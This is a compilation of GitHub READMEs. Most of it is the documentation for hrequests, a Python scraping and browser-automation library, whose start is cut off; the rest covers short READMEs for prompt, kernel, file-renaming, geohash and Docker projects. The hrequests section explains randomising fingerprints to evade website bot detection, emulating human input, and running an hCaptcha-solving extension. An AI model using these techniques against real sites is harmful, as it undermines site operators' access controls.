``` </details> Browsers can also be created through the `firefox`, `chrome`, and `opera` shortcuts: ```py >>> session = hrequests.firefox.Session() >>> session = hrequests.chrome.Session() >>> session = hrequests.opera.Session() ``` <details> <summary>Parameters</summary> ``` Parameters: version (int, optional): Version of the browser to use. Browser must be specified. Default is randomized. os (Literal['win', 'mac', 'lin'], optional): OS to use in header. Default is randomized. headers (dict, optional): Dictionary of HTTP headers to send with the request. Default is generated from `browser` and `os`. verify (bool, optional): Verify the server's TLS certificate. Defaults to True. ja3_string (str, optional): JA3 string. Defaults to None. h2_settings (dict, optional): HTTP/2 settings. Defaults to None. additional_decode (str, optional): Additional decode. Defaults to None. pseudo_header_order (list, optional): Pseudo header order. Defaults to None. priority_frames (list, optional): Priority frames. Defaults to None. header_order (list, optional): Header order. Defaults to None. force_http1 (bool, optional): Force HTTP/1. Defaults to False. catch_panics (bool, optional): Catch panics. Defaults to False. debug (bool, optional): Debug mode. Defaults to False. ``` </details> `os` can be `'win'`, `'mac'`, or `'lin'`. Default is randomized. ```py >>> session = hrequests.firefox.Session(os='mac') ``` This will automatically generate headers based on the browser name and OS: ```py >>> session.headers {'Accept': '*/*', 'Connection': 'keep-alive', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4; rv:60.2.2) Gecko/20100101 Firefox/60.2.2', 'Accept-Encoding': 'gzip, deflate, br', 'Pragma': 'no-cache'} ``` <details> <summary>Why is the browser version in the header different than the TLS browser version?</summary> Website bot detection systems typically do not correlate the TLS fingerprint browser version with the browser header. By adding more randomization to our headers, we can make our requests appear to be coming from a larger number of clients. We can make it seem like our requests are coming from a larger number of clients. This makes it harder for websites to identify and block our requests based on a consistent browser version. </details> ### Properties Here is a simple get request. This is a wraper around `hrequests.get`. The only difference is that the session cookies are updated with each request. Creating sessions are recommended for making multiple requests to the same domain. ```py >>> resp = session.get('https://www.google.com/') ``` Session cookies update with each request: ```py >>> session.cookies: RequestsCookieJar <RequestsCookieJar[Cookie(version=0, name='1P_JAR', value='2023-07-05-20', port=None, port_specified=False, domain='.google.com', domain_specified=True... 
``` Regenerate headers for a different OS: ```py >>> session.os = 'win' >>> session.headers: CaseInsensitiveDict {'Accept': '*/*', 'Connection': 'keep-alive', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0.3) Gecko/20100101 Firefox/66.0.3', 'Accept-Encoding': 'gzip, deflate, br', 'Accept-Language': 'en-US;q=0.5,en;q=0.3', 'Cache-Control': 'max-age=0', 'DNT': '1', 'Upgrade-Insecure-Requests': '1', 'Pragma': 'no-cache'} ``` ### Closing Sessions Sessions can also be closed to free memory: ```py >>> session.close() ``` Alternatively, sessions can be used as context managers: ```py with hrequests.Session() as session: resp = session.get('https://www.google.com/') print(resp) ``` <hr width=50> ## Concurrent & Lazy Requests ### "Lazy" Requests Adding the `no_pause=True` keyword argument will return a `LazyTLSRequest` object. This will send the request immediately, but doesn't wait for the response to be ready until an attribute of the response is accessed. ```py resp1 = hrequests.get('https://www.google.com/', no_pause=True) resp2 = hrequests.get('https://www.google.com/', no_pause=True) # resp1 and resp2 are sent concurrently print('Resp 1:', resp1.reason) # will pause for resp1 to finish, if it hasn't already print('Resp 2:', resp2.reason) # will pause for resp2 to finish, if it hasn't already ``` This is useful for sending multiple requests concurrently, but only waiting for the response when it is needed. Note that `no_pause` uses gevent as it's backend. Use `no_pause_threadsafe` when running across multiple threads. ### Grequests-style Async Requests The method `async_get` will create an unsent request. <details> <summary>Parameters</summary> ``` Parameters: url (str): URL to send request to data (Union[str, bytes, bytearray, dict], optional): Data to send to request. Defaults to None. files (Dict[str, Union[BufferedReader, tuple]], optional): Data to send to request. Defaults to None. headers (dict, optional): Dictionary of HTTP headers to send with the request. Defaults to None. params (dict, optional): Dictionary of URL parameters to append to the URL. Defaults to None. cookies (Union[RequestsCookieJar, dict, list], optional): Dict or CookieJar to send. Defaults to None. json (dict, optional): Json to send in the request body. Defaults to None. allow_redirects (bool, optional): Allow request to redirect. Defaults to True. history (bool, optional): Remember request history. Defaults to False. verify (bool, optional): Verify the server's TLS certificate. Defaults to True. timeout (int, optional): Timeout in seconds. Defaults to 30. proxies (dict, optional): Dictionary of proxies. Defaults to None. no_pause (bool, optional): Run the request in the background. Defaults to False. <Additionally includes all parameters from `hrequests.Session` if a session was not specified> Returns: hrequests.response.Response: Response object ``` </details> Async requests are evaluated on `hrequests.map`, `hrequests.imap`, or `hrequests.imap_enum`. This functionality is similar to [grequests](https://github.com/spyoungtech/grequests). Unlike grequests, [monkey patching](https://www.gevent.org/api/gevent.monkey.html) is not required because this does not rely on the standard python SSL library. 
Create a set of unsent Requests: ```py reqs = [ hrequests.async_get('https://www.google.com/'), hrequests.async_get('https://www.duckduckgo.com/'), hrequests.async_get('https://www.yahoo.com/') ] ``` #### map Send them all at the same time using map: ```py >>> hrequests.map(reqs, size=3) [<Response [200]>, <Response [200]>, <Response [200]>] ``` <details> <summary>Parameters</summary> ``` Concurrently converts a list of Requests to Responses. Parameters: requests - a collection of Request objects. size - Specifies the number of requests to make at a time. If None, no throttling occurs. exception_handler - Callback function, called when exception occured. Params: Request, Exception timeout - Gevent joinall timeout in seconds. (Note: unrelated to requests timeout) Returns: A list of Response objects. ``` </details> #### imap `imap` returns a generator that yields responses as they come in: ```py >>> for resp in hrequests.imap(reqs, size=3): ... print(resp) <Response [200]> <Response [200]> <Response [200]> ``` <details> <summary>Parameters</summary> ``` Concurrently converts a generator object of Requests to a generator of Responses. Parameters: requests - a generator or sequence of Request objects. size - Specifies the number of requests to make at a time. default is 2 exception_handler - Callback function, called when exception occurred. Params: Request, Exception Yields: Response objects. ``` </details> `imap_enum` returns a generator that yields a tuple of `(index, response)` as they come in. The `index` is the index of the request in the original list: ```py >>> for index, resp in hrequests.imap_enum(reqs, size=3): ... print(index, resp) (1, <Response [200]>) (0, <Response [200]>) (2, <Response [200]>) ``` <details> <summary>Parameters</summary> ``` Like imap, but yields tuple of original request index and response object Unlike imap, failed results and responses from exception handlers that return None are not ignored. Instead, a tuple of (index, None) is yielded. Responses are still in arbitrary order. Parameters: requests - a sequence of Request objects. size - Specifies the number of requests to make at a time. default is 2 exception_handler - Callback function, called when exception occurred. Params: Request, Exception Yields: (index, Response) tuples. ``` </details> #### Exception Handling To handle timeouts or any other exception during the connection of the request, you can add an optional exception handler that will be called with the request and exception inside the main thread. ```py >>> def exception_handler(request, exception): ... return f'Response failed: {exception}' >>> bad_reqs = [ ... hrequests.async_get('http://httpbin.org/delay/5', timeout=1), ... hrequests.async_get('http://fakedomain/'), ... hrequests.async_get('http://example.com/'), ... ] >>> hrequests.map(bad_reqs, size=3, exception_handler=exception_handler) ['Response failed: Connection error', 'Response failed: Connection error', <Response [200]>] ``` The value returned by the exception handler will be used in place of the response in the result list: <hr width=50> ## HTML Parsing HTML scraping uses PyQuery, which is ~7x faster than bs4. This functionality is based of [requests-html](https://github.com/psf/requests-html). 
| Library | Time (1e5 trials) | | --- | --- | | BeautifulSoup4 | 52.6 | | PyQuery | 7.5 | The HTML parser can be accessed through the `html` attribute of the response object: ```py >>> resp = session.get('https://python.org/') >>> resp.html <HTML url='https://www.python.org/'> ``` ### Parsing page Grab a list of all links on the page, as-is (anchors excluded): ```py >>> resp.html.links {'//docs.python.org/3/tutorial/', '/about/apps/', 'https://github.com/python/pythondotorg/issues', '/accounts/login/', '/dev/peps/', '/about/legal/',... ``` Grab a list of all links on the page, in absolute form (anchors excluded): ```py >>> resp.html.absolute_links {'https://github.com/python/pythondotorg/issues', 'https://docs.python.org/3/tutorial/', 'https://www.python.org/about/success/', 'http://feedproxy.g... ``` Search for text on the page: ```py >>> resp.html.search('Python is a {} language')[0] programming ``` ### Selecting elements Select an element using a CSS Selector: ```py >>> about = resp.html.find('#about') ``` <details> <summary>Parameters</summary> ``` Given a CSS Selector, returns a list of :class:`Element <Element>` objects or a single one. Parameters: selector: CSS Selector to use. clean: Whether or not to sanitize the found HTML of ``<script>`` and ``<style>`` containing: If specified, only return elements that contain the provided text. first: Whether or not to return just the first result. _encoding: The encoding format. Returns: A list of :class:`Element <Element>` objects or a single one. Example CSS Selectors: - ``a`` - ``a.someClass`` - ``a#someID`` - ``a[target=_blank]`` See W3School's `CSS Selectors Reference <https://www.w3schools.com/cssref/css_selectors.asp>`_ for more details. If ``first`` is ``True``, only returns the first :class:`Element <Element>` found. ``` </details> XPath is also supported: ```py >>> resp.html.xpath('/html/body/div[1]/a') [<Element 'a' class=('px-2', 'py-4', 'show-on-focus', 'js-skip-to-content') href='#start-of-content' tabindex='1'>] ``` <details> <summary>Parameters</summary> ``` Given an XPath selector, returns a list of Element objects or a single one. Parameters: selector (str): XPath Selector to use. clean (bool, optional): Whether or not to sanitize the found HTML of <script> and <style> tags. Defaults to first (bool, optional): Whether or not to return just the first result. Defaults to False. _encoding (str, optional): The encoding format. Defaults to None. Returns: _XPath: A list of Element objects or a single one. If a sub-selector is specified (e.g. //a/@href), a simple list of results is returned. See W3School's XPath Examples for more details. If first is True, only returns the first Element found. 
``` </details> ### Introspecting elements Grab an Element's text contents: ```py >>> print(about.text) About Applications Quotes Getting Started Help Python Brochure ``` Getting an Element's attributes: ```py >>> about.attrs {'id': 'about', 'class': ('tier-1', 'element-1'), 'aria-haspopup': 'true'} ``` Get an Element's raw HTML: ```py >>> about.html '<li aria-haspopup="true" class="tier-1 element-1 " id="about">\n<a class="" href="/about/" title="">About</a>\n<ul aria-hidden="true" class="subnav menu" role="menu">\n<li class="tier-2 element-1" role="treeitem"><a href="/about/apps/" title="">Applications</a></li>\n<li class="tier-2 element-2" role="treeitem"><a href="/about/quotes/" title="">Quotes</a></li>\n<li class="tier-2 element-3" role="treeitem"><a href="/about/gettingstarted/" title="">Getting Started</a></li>\n<li class="tier-2 element-4" role="treeitem"><a href="/about/help/" title="">Help</a></li>\n<li class="tier-2 element-5" role="treeitem"><a href="http://brochure.getpython.info/" title="">Python Brochure</a></li>\n</ul>\n</li>' ``` Select Elements within Elements: ```py >>> about.find_all('a') [<Element 'a' href='/about/' title='' class=''>, <Element 'a' href='/about/apps/' title=''>, <Element 'a' href='/about/quotes/' title=''>, <Element 'a' href='/about/gettingstarted/' title=''>, <Element 'a' href='/about/help/' title=''>, <Element 'a' href='http://brochure.getpython.info/' title=''>] >>> about.find('a') <Element 'a' href='/about/' title='' class=''> ``` Search for links within an element: ```py >>> about.absolute_links {'http://brochure.getpython.info/', 'https://www.python.org/about/gettingstarted/', 'https://www.python.org/about/', 'https://www.python.org/about/quotes/', 'https://www.python.org/about/help/', 'https://www.python.org/about/apps/'} ``` <hr width=50> ## Browser Automation You can spawn a `BrowserSession` instance by calling it: ```py >>> page = hrequests.BrowserSession() # headless=True by default ``` <details> <summary>Parameters</summary> ``` Parameters: headless (bool, optional): Whether to run the browser in headless mode. Defaults to True. session (hrequests.session.TLSSession, optional): Session to use for headers, cookies, etc. resp (hrequests.response.Response, optional): Response to update with cookies, headers, etc. proxy_ip (str, optional): Proxy to use for the browser. Example: 123.123.123 mock_human (bool, optional): Whether to emulate human behavior. Defaults to False. browser (Literal['firefox', 'chrome', 'opera'], optional): Generate useragent headers for a specific browser os (Literal['win', 'mac', 'lin'], optional): Generate headers for a specific OS extensions (Union[str, Iterable[str]], optional): Path to a folder of unpacked extensions, or a list of paths to unpacked extensions ``` </details> `BrowserSession` is entirely safe to use across threads. ### Render an existing Response Responses have a `.render()` method. This will render the contents of the response in a browser page. Once the page is closed, the Response content and the Response's session cookies will be updated. **Example - submitting a login form:** ```py >>> resp = session.get('https://www.somewebsite.com/') >>> with resp.render(mock_human=True) as page: ... page.type('.input#username', 'myuser') ... page.type('.input#password', 'p4ssw0rd') ... page.click('#submit') # `session` & `resp` now have updated cookies, content, etc. 
``` <details> <summary><strong>Or, without a context manager</strong></summary> ```py >>> resp = session.get('https://www.somewebsite.com/') >>> page = resp.render(mock_human=True) >>> page.type('.input#username', 'myuser') >>> page.type('.input#password', 'p4ssw0rd') >>> page.click('#submit') >>> page.close() # must close the page when done! ``` </details> The `mock_human` parameter will emulate human-like behavior. This includes easing and randomizing mouse movements, and randomizing typing speed. This functionality is based on [botright](https://github.com/Vinyzu/botright/). <details> <summary>Parameters</summary> ``` Parameters: headless (bool, optional): Whether to run the browser in headless mode. Defaults to False. mock_human (bool, optional): Whether to emulate human behavior. Defaults to False. extensions (Union[str, Iterable[str]], optional): Path to a folder of unpacked extensions, or a list of paths to unpacked extensions ``` </details> ### Properties Cookies are inherited from the session: ```py >>> page.cookies: RequestsCookieJar # cookies are inherited from the session <RequestsCookieJar[Cookie(version=0, name='1P_JAR', value='2023-07-05-20', port=None, port_specified=False, domain='.somewebsite.com', domain_specified=True... ``` ### Pulling page data Get current page url: ```py >>> page.url: str https://www.somewebsite.com/ ``` Get page content: ```py >>> page.text: str '<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world\'s information, including webpag' >>> page.content: bytes b'<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world\'s information, including webpag' ``` Parsing HTML from the page content: ```py >>> page.html.find_all('a') [<Element 'a' href='/about/' title='' class=''>, <Element 'a' href='/about/apps/' title=''>, ...] >>> page.html.find('a') <Element 'a' href='/about/' title='' class=''>, <Element 'a' href='/about/apps/' title=''> ``` Take a screenshot of the page: ```py page.screenshot('screenshot.png') ``` <details> <summary>Parameters</summary> ``` Parameters: path (str): Path to save screenshot to full_page (bool): Whether to take a screenshot of the full scrollable page ``` </details> ### Navigate the browser Navigate to a url: ```py >>> page.url = 'https://bing.com' # or use goto >>> page.goto('https://bing.com') ``` Navigate through page history: ```py >>> page.back() >>> page.forward() ``` ### Controlling elements Click an element: ```py >>> page.click('#my-button') # or through the html parser >>> page.html.find('#my-button').click() ``` <details> <summary>Parameters</summary> ``` Parameters: selector (str): CSS selector to click. button (Literal['left', 'right', 'middle'], optional): Mouse button to click. Defaults to 'left'. count (int, optional): Number of clicks. Defaults to 1. timeout (float, optional): Timeout in seconds. Defaults to 30. wait_after (bool, optional): Wait for a page event before continuing. Defaults to True. ``` </details> Hover over an element: ```py >>> page.hover('.dropbtn') # or through the html parser >>> page.html.find('.dropbtn').hover() ``` <details> <summary>Parameters</summary> ``` Parameters: selector (str): CSS selector to hover over modifiers (List[Literal['Alt', 'Control', 'Meta', 'Shift']], optional): Modifier keys to press. Defaults to None. timeout (float, optional): Timeout in seconds. Defaults to 90. 
``` </details> Type text into an element: ```py >>> page.type('#my-input', 'Hello world!') # or through the html parser >>> page.html.find('#my-input').type('Hello world!') ``` <details> <summary>Parameters</summary> ``` Parameters: selector (str): CSS selector to type in text (str): Text to type delay (int, optional): Delay between keypresses in ms. On mock_human, this is randomized by 50%. Defaults to 50. timeout (float, optional): Timeout in seconds. Defaults to 30. ``` </details> Drag and drop an element: ```py >>> page.dragTo('#source-selector', '#target-selector') # or through the html parser >>> page.html.find('#source-selector').dragTo('#target-selector') ``` <details> <summary>Parameters</summary> ``` Parameters: source (str): Source to drag from target (str): Target to drop to timeout (float, optional): Timeout in seconds. Defaults to 30. wait_after (bool, optional): Wait for a page event before continuing. Defaults to False. check (bool, optional): Check if an element is draggable before running. Defaults to False. Throws: hrequests.exceptions.BrowserTimeoutException: If timeout is reached ``` </details> ### Check page elements Check if a selector is visible and enabled: ```py >>> page.isVisible('#my-selector'): bool >>> page.isEnabled('#my-selector'): bool ``` <details> <summary>Parameters</summary> ``` Parameters: selector (str): Selector to check ``` </details> Evaluate and return a script: ```py >>> page.evaluate('selector => document.querySelector(selector).checked', '#my-selector') ``` <details> <summary>Parameters</summary> ``` Parameters: script (str): Javascript to evaluate in the page arg (str, optional): Argument to pass into the javascript function ``` </details> ### Awaiting events ```py >>> page.awaitNavigation() ``` <details> <summary>Parameters</summary> ``` Parameters: timeout (float, optional): Timeout in seconds. Defaults to 30. Throws: hrequests.exceptions.BrowserTimeoutException: If timeout is reached ``` </details> Wait for a script or function to return a truthy value: ```py >>> page.awaitScript('selector => document.querySelector(selector).value === 100', '#progress') ``` <details> <summary>Parameters</summary> ``` Parameters: script (str): Script to evaluate arg (str, optional): Argument to pass to script timeout (float, optional): Timeout in seconds. Defaults to 30. Throws: hrequests.exceptions.BrowserTimeoutException: If timeout is reached ``` </details> Wait for the URL to match: ```py >>> page.awaitUrl(re.compile(r'https?://www\.google\.com/.*'), timeout=10) ``` <details> <summary>Parameters</summary> ``` Parameters: url (Union[str, Pattern[str], Callable[[str], bool]]) - URL to match for timeout (float, optional): Timeout in seconds. Defaults to 30. Throws: hrequests.exceptions.BrowserTimeoutException: If timeout is reached ``` </details> Wait for an element to exist on the page: ```py >>> page.awaitSelector('#my-selector') ``` <details> <summary>Parameters</summary> ``` Parameters: selector (str): Selector to wait for timeout (float, optional): Timeout in seconds. Defaults to 30. Throws: hrequests.exceptions.BrowserTimeoutException: If timeout is reached ``` </details> Wait for an element to be enabled: ```py >>> page.awaitEnabled('#my-selector') ``` <details> <summary>Parameters</summary> ``` Parameters: selector (str): Selector to wait for timeout (float, optional): Timeout in seconds. Defaults to 30. 
Throws: hrequests.exceptions.BrowserTimeoutException: If timeout is reached ``` </details> ### Adding Chrome extensions Chrome extensions can be easily imported into a browser session. Some potentially useful extensions include: - [hektCaptcha](https://github.com/Wikidepia/hektCaptcha-extension) - Hcaptcha solver - [uBlock Origin](https://github.com/gorhill/uBlock) - Ad & popup blocker - [FastForward](https://fastforward.team/) - Bypass & skip link redirects Extensions are added with the `extensions` parameter. - This can be an list of absolute paths to unpacked extensions: ```py with resp.render(extensions=['C:\\extentions\\hektcaptcha', 'C:\\extentions\\ublockorigin']): ``` - Or a folder containing the unpacked extensions: ```py with resp.render(extensions='C:\\extentions'): ``` Note that these need to be *unpacked* extensions. You can unpack a `.crx` file by changing the file extension to `.zip` and extracting the contents. Here is an usage example of using a captcha solver: ```py >>> with hrequests.render('https://accounts.hcaptcha.com/demo', extensions=['C:\\extentions\\hektcaptcha']) as page: ... page.awaitSelector('.hcaptcha-success') # wait for captcha to finish ... page.click('input[type=submit]') ``` ### Requests & Responses Requests can also be sent within browser sessions. These operate the same as the standard `hrequests.request`, and will use the browser's cookies and headers. The `BrowserSession` cookies will be updated with each request. This returns a normal `Response` object: ```py >>> resp = page.get('https://duckduckgo.com') ``` <details> <summary>Parameters</summary> ``` Parameters: url (str): URL to send request to params (dict, optional): Dictionary of URL parameters to append to the URL. Defaults to None. data (Union[str, dict], optional): Data to send to request. Defaults to None. headers (dict, optional): Dictionary of HTTP headers to send with the request. Defaults to None. form (dict, optional): Form data to send with the request. Defaults to None. multipart (dict, optional): Multipart data to send with the request. Defaults to None. timeout (float, optional): Timeout in seconds. Defaults to 30. verify (bool, optional): Verify the server's TLS certificate. Defaults to True. max_redirects (int, optional): Maximum number of redirects to follow. Defaults to None. Throws: hrequests.exceptions.BrowserTimeoutException: If timeout is reached Returns: hrequests.response.Response: Response object ``` </details> Other methods include `post`, `put`, `delete`, `head`, and `patch`. ### Closing the page The `BrowserSession` object must be closed when finished. This will close the browser, update the response data, and merge new cookies with the session cookies. ```py >>> page.close() ``` Note that this is automatically done when using a context manager. Session cookies are updated: ```py >>> session.cookies: RequestsCookieJar <RequestsCookieJar[Cookie(version=0, name='MUID', value='123456789', port=None, port_specified=False, domain='.bing.com', domain_specified=True, domain_initial_dot=True... ``` Response data is updated: ```py >>> resp.url: str 'https://www.bing.com/?toWww=1&redig=823778234657823652376438' >>> resp.content: Union[bytes, str] '<!DOCTYPE html><html lang="en" dir="ltr"><head><meta name="theme-color" content="#4F4F4F"><meta name="description" content="Bing helps you turn inform... 
``` #### Other ways to create a Browser Session You can use `.render` to spawn a `BrowserSession` object directly from a url: ```py # Using a Session: >>> page = session.render('https://google.com') # Or without a session at all: >>> page = hrequests.render('https://google.com') ``` Make sure to close all `BrowserSession` objects when done! ```py >>> page.close() ``` ---
pikho/ppromptor
https://github.com/pikho/ppromptor
Prompt-Promptor is a python library for automatically generating prompts using LLMs
# Prompt-Promptor: An Autonomous Agent Framework for Prompt Engineering Prompt-Promptor (or ppromptor for short) is a Python library designed to automatically generate and improve prompts for LLMs. It draws inspiration from autonomous agents like AutoGPT and consists of three agents: Proposer, Evaluator, and Analyzer. These agents work together with human experts to continuously improve the generated prompts. ## 🚀 Features: - 🤖 Uses LLMs to prompt themselves, given a few samples. - 💪 Guidance for OSS LLMs (e.g., LLaMA) by more powerful LLMs (e.g., GPT-4) - 📈 Continuous improvement. - 👨‍👨‍👧‍👦 Collaboration with human experts. - 💼 Experiment management for prompt engineering. - 🖼 Web GUI interface. - 🏳️‍🌈 Open Source. ## Warning - This project is currently in its early stage, and it is anticipated that there will be major design changes in the future. - The main function utilizes an infinite loop to enhance the generation of prompts. If you opt for OpenAI's ChatGPT as the Target/Analysis LLMs, kindly ensure that you set a usage limit. ## Concept ![Compare Prompts](https://github.com/pikho/ppromptor/blob/main/doc/images/concept.png?raw=true) A more detailed class diagram can be found in the [doc](https://github.com/pikho/ppromptor/tree/main/doc) ## Installation ### From GitHub 1. Install Package ``` pip install ppromptor --upgrade ``` 2. Clone Repository from GitHub ``` git clone https://github.com/pikho/ppromptor.git ``` 3. Start Web UI ``` cd ppromptor streamlit run ui/app.py ``` ### Running a Local Model (WizardLM) 1. Install Required Packages ``` pip install -r requirements_local_model.txt ``` 2. Test that WizardLM runs correctly ``` cd <path_to_ppromptor>/ppromptor/llms python wizardlm.py ``` ## Usage 1. Start the Web App ``` cd <path_to_ppromptor> streamlit run ui/app.py ``` 2. Load the Demo Project Load `examples/antonyms.db` (the default) for demo purposes. This demonstrates how to use ChatGPT to guide WizardLM to generate antonyms for given inputs. 3. Configuration In the Configuration tab, set `Target LLM` to `wizardlm` if you can run this model locally, or choose `chatgpt` for both `Target LLM` and `Analysis LLM`. If chatgpt is used, please provide the OpenAI API key. 4. Load the dataset The demo project has already loaded 5 records. You can optionally add your own dataset. 5. Start the Workload Press the `Start` button to activate the workflow. 6. Prompt Candidates Generated prompts can be found in the `Prompt Candidates` tab. You can modify a generated prompt by selecting exactly 1 candidate, editing the prompt, and then clicking `Create Prompt`. This new prompt will be evaluated by the Evaluator agent and then continuously improved by the Analyzer agent. By selecting 2 prompts, you can compare these prompts side by side. ![Compare Prompts](https://github.com/pikho/ppromptor/blob/main/doc/images/cmp_candidates-1.png?raw=true) ![Compare Prompts](https://github.com/pikho/ppromptor/blob/main/doc/images/cmp_candidates-2.png?raw=true) ## Contribution We welcome all kinds of contributions, including new feature requests, bug fixes, new feature implementations, examples, and documentation updates. If you have a specific request, please use the "Issues" section. For other contributions, simply create a pull request (PR). Your participation is highly valued in improving our project. Thank you!
zhenruyan/WSL-libre-linux-kernel
https://github.com/zhenruyan/WSL-libre-linux-kernel
Install a 100% libre (free) Linux kernel for WSL; it is possible to celebrate freedom within a cell. Replace WSL's kernel with a libre one!!!
![无标题](https://github.com/zhenruyan/WSL-libre-linux-kernel/assets/9253251/64554eeb-1075-43b6-aba4-f1eb412d1143) # WSL replace libre linux kernel 100% libre!! [ENGLISH](https://github.com/zhenruyan/WSL-libre-linux-kernel/blob/master/README.md)/[简体中文](https://github.com/zhenruyan/WSL-libre-linux-kernel/blob/master/README_CN.md) [![General build kernel](https://github.com/zhenruyan/WSL-libre-linux-kernel/actions/workflows/blank.yml/badge.svg)](https://github.com/zhenruyan/WSL-libre-linux-kerne/actions/workflows/blank.yml) [![Coverage Status](https://coveralls.io/repos/github/zhenruyan/WSL-libre-linux-kernel/badge.svg?branch=master)](https://coveralls.io/github/zhenruyan/WSL-libre-linux-kernel?branch=master) [![TODOs](https://badgen.net/https/api.tickgit.com/badgen/github.com/zhenruyan/WSL-libre-linux-kernel)](https://www.tickgit.com/browse?repo=github.com/zhenruyan/WSL-libre-linux-kernel) IRC: `#WSL-libre-linux-kernel` on [Libera Chat](https://libera.chat), https://web.libera.chat/#WSL-libre-linux-kernel ## You can also enjoy in windows, completely 100% free kernel * Optimization Async io * Optimization Scheduler * Optimize memory footprint * Enhanced for real-time applications * Modules such as ntfs. * Modules such as exfat. * Modules such as f2fs. * Modules such as btrfs. * kvm are enabled by default. * Better support for ssd and other devices. ## todo - [x] Automatic synchronization of source codes - [ ] Automatic compilation based on tag - [ ] installation script - [ ] Published to scoop winget chocolatey and other windows package management platforms. ![logo](https://www.fsfla.org/ikiwiki/selibre/linux-libre/100gnu+freedo.png) [install kernel](https://github.com/zhenruyan/WSL-libre-linux-kernel/wiki/install-kernel) [build kernel](https://github.com/zhenruyan/WSL-libre-linux-kernel/wiki/config-and-build-kernel) [microsoft wsl2 documents](https://learn.microsoft.com/zh-cn/windows/wsl/wsl-config) Exciting and delightful GNU Linux-libre, Free as in Freedo ![librelinux](https://www.fsfla.org/ikiwiki/selibre/linux-libre/stux.jpg) > The freedom to run the program as you wish, for any purpose (freedom 0). > The freedom to study how the program works, and change it so it does your computing as you wish (freedom 1). Access to the source code is a precondition for this. > The freedom to redistribute copies so you can help others (freedom 2). > The freedom to distribute copies of your modified versions to others (freedom 3). By doing this you can give the whole community a chance to benefit from your changes. Access to the source code is a precondition for this. ![image](https://github.com/zhenruyan/WSL-libre-linux-kernel/assets/9253251/f7f8de26-7761-453f-90de-f6f44b9d7c63) ## All binaries were compiled using an E5 2689 engraved with a logo celebrating the 40th anniversary of GNU. Full of libre faith! ![image](https://github.com/zhenruyan/WSL-libre-linux-kernel/assets/9253251/7de8fa88-8e5a-4f26-9a14-1df6126552d2) ## Celebrate GNU's 40th anniversary with us, we hope to have 40 release announcements, discussions or presentations in one day! https://www.gnu.org/gnu40/ ![https://www.gnu.org/gnu40/](https://www.gnu.org/gnu40/GNU40_HM_banner.png) # thinks * [https://gnu.org](https://gnu.org) * [https://github.com/microsoft/WSL2-Linux-Kernel](https://github.com/microsoft/WSL2-Linux-Kernel) * [https://www.fsfla.org/ikiwiki/selibre/linux-libre/](https://www.fsfla.org/ikiwiki/selibre/linux-libre/)
terror/edmv
https://github.com/terror/edmv
Bulk rename files with your favourite editor
## edmv 📦 [![CI](https://github.com/terror/edmv/actions/workflows/ci.yml/badge.svg)](https://github.com/terror/edmv/actions/workflows/ci.yml) [![crates.io](https://shields.io/crates/v/edmv.svg)](https://crates.io/crates/edmv) **edmv** is a tool that lets you bulk rename files fast using your preferred text editor. ### Demo Below is a short demo showcasing the main functionality of the program: [![asciicast](https://asciinema.org/a/33OVZX9m1PZcyqYvdqmtvBRRv.svg)](https://asciinema.org/a/33OVZX9m1PZcyqYvdqmtvBRRv) ### Installation You can install the **edmv** command-line utility via the Rust package manager [cargo](https://doc.rust-lang.org/cargo/): ```bash cargo install edmv ``` ...or you can build it from source: ```bash git clone https://github.com/terror/edmv cd edmv cargo install --path . ``` ...or you can download one of the pre-built binaries from the [releases](https://github.com/terror/edmv/releases) page. ### Usage Below is the output of `edmv --help`: ``` Bulk rename files using your favorite editor Usage: edmv [OPTIONS] [sources]... Arguments: [sources]... Paths to edit Options: --editor <EDITOR> Editor command to use --force Overwrite existing files --resolve Resolve conflicting renames --dry-run Run without making any changes -h, --help Print help -V, --version Print version ``` An option of note is `--resolve`: it applies an intermediate rename to sources via either a temporary directory or file, automatically handling conflicts such as overlapping or circular renames. ### Prior Art **edmv** is a tested and extended re-implementation of the version [Casey](https://github.com/casey) wrote in [Python](https://github.com/casey/edmv) - do check it out!
nmmmnu/geohash
https://github.com/nmmmnu/geohash
geohash implementation in C++
GEOHASH - implementation in C++ =============================== --- ### What is geohash? Geohash is an algorithm for encoding two-dimensional coordinates into a hash. - [wikipedia] - [Movable Type Scripts] ### This release - Modern C++17 - Fast, no allocations - Neighbour cell optimization [wikipedia]: https://en.wikipedia.org/wiki/Geohash [Movable Type Scripts]: https://www.movable-type.co.uk/scripts/geohash.html
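For readers new to the algorithm, the sketch below illustrates the basic encoding idea in Python (it is not taken from this C++ library): longitude and latitude bits are interleaved by repeatedly halving the coordinate ranges, and every 5 bits become one base32 character. The test coordinate is the well-known example from the references above.

```python
BASE32 = "0123456789bcdefghjkmnpqrstuvwxyz"  # geohash alphabet (no a, i, l, o)

def geohash_encode(lat: float, lon: float, precision: int = 11) -> str:
    lat_lo, lat_hi = -90.0, 90.0
    lon_lo, lon_hi = -180.0, 180.0
    chars, bits, bit_count, even = [], 0, 0, True  # even-numbered bits encode longitude
    while len(chars) < precision:
        if even:
            mid = (lon_lo + lon_hi) / 2
            bit = 1 if lon >= mid else 0
            lon_lo, lon_hi = (mid, lon_hi) if bit else (lon_lo, mid)
        else:
            mid = (lat_lo + lat_hi) / 2
            bit = 1 if lat >= mid else 0
            lat_lo, lat_hi = (mid, lat_hi) if bit else (lat_lo, mid)
        bits = (bits << 1) | bit
        bit_count += 1
        even = not even
        if bit_count == 5:                 # every 5 bits -> one base32 character
            chars.append(BASE32[bits])
            bits, bit_count = 0, 0
    return "".join(chars)

print(geohash_encode(57.64911, 10.40744))  # -> u4pruydqqvj
```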
ubergeek77/lemmy-docker-multiarch
https://github.com/ubergeek77/lemmy-docker-multiarch
A build repository for multiarch Docker images for Lemmy
